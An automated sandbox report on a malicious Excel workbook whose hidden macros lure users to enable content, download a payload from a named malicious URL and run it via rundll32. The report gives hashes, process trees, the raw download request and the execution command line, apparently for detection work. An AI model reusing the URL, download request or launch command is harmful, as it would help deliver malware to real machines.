Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls)
Analysis ID:383014
MD5:a7c64329efaea29a2dc97ced238490f7
SHA1:5d4b9b386354444cf74fd858e3409f0294c45330
SHA256:8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2556 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2564 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2364 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://revolet-sa.com/files/countryyelow.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://revolet-sa.com/files/countryyelow.phpVirustotal: Detection: 12%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbxVirustotal: Detection: 21%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsVirustotal: Detection: 13%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: ySiCz[1].fbx.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: revolet-sa.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.232.249.186:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.232.249.186:80
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5826D0B3.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: revolet-sa.com
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. :54 Protected View Thi
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 18 the decryption of the docum
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 14Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 14Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsInitial sample: EXEC
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox ViewDropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLS@7/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC36D.tmpJump to behavior
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsVirustotal: Detection: 13%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01ED1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02420E20 push dword ptr [edx+14h]; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01ED1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00340456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034095E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01ED1030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01ED1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls13%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx22%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx5%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx2%ReversingLabsWin32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds5%MetadefenderBrowse
C:\Users\user\sdbybsd.fds2%ReversingLabsWin32.Trojan.Trickpak

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.rundll32.exe.23b0000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
revolet-sa.com4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://revolet-sa.com/files/countryyelow.php13%VirustotalBrowse
http://revolet-sa.com/files/countryyelow.php100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
revolet-sa.com
192.232.249.186
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://revolet-sa.com/files/countryyelow.phptrue
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpfalse
          high
          http://www.%s.comPArundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                192.232.249.186
                revolet-sa.comUnited States
                46606UNIFIEDLAYER-AS-1USfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:383014
                Start date:07.04.2021
                Start time:05:53:16
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 21s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls)
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winXLS@7/8@1/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 8.1% (good quality ratio 5.4%)
                • Quality average: 64.3%
                • Quality standard deviation: 45.9%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • TCP Packets have been reduced to 100
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                05:53:40API Interceptor8x Sleep call for process: rundll32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                192.232.249.186SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php
                SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                revolet-sa.comSecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                UNIFIEDLAYER-AS-1USSecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SALM0BRU.exeGet hashmaliciousBrowse
                • 162.241.148.243
                Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
